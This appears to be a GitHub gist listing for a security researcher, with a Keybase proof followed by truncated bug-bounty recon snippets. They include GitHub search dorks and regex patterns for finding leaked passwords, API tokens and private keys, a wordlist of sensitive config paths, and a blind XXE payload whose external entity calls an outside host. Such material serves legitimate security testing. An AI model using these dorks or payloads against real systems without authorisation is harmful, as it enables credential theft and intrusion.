codingo

Keybase proof

I hereby claim:

• I am codingo on github.
• I am codingo (https://keybase.io/codingo) on keybase.
• I have a public key ASCkCI_wS4MUc722wLOXqrqq7x-jrHAKYJx-tSNs1vGHrAo

To claim this, I am signing this object:

codingo

import requests
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()

http_proxy = "http://192.168.1.130:8085"
proxyDict = { 
              "http"  : http_proxy, 
              "https" : http_proxy, 

codingo

/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore

codingo

https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI

codingo

{
    "flags": "-HnriE",
    "patterns": [
		"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
		"-----BEGIN RSA PRIVATE KEY-----",
		"-----BEGIN DSA PRIVATE KEY-----",
		"-----BEGIN EC PRIVATE KEY-----",
		"-----BEGIN PGP PRIVATE KEY BLOCK-----",
		"AKIA[0-9A-Z]{16}",
		"amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",

codingo

{
  "mode": "patterns",
  "proxySettings": [
    {
      "address": "127.0.0.1",
      "port": 8080,
      "username": "",
      "password": "",
      "type": 1,
      "title": "127.0.0.1:8080",

codingo

import re
import sys

VULNERABLE_HREF = r'href: [^"].+[^\s;,]'
STATE_VALUES = r'\.setState\({([\s\S]*?)}\)'

#false_positives = ("this.props.team.", "constants.")

def find_state_candidates(name, states):
        candidates = []

codingo

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

codingo

#!/bin/bash

# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"

codingo

curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt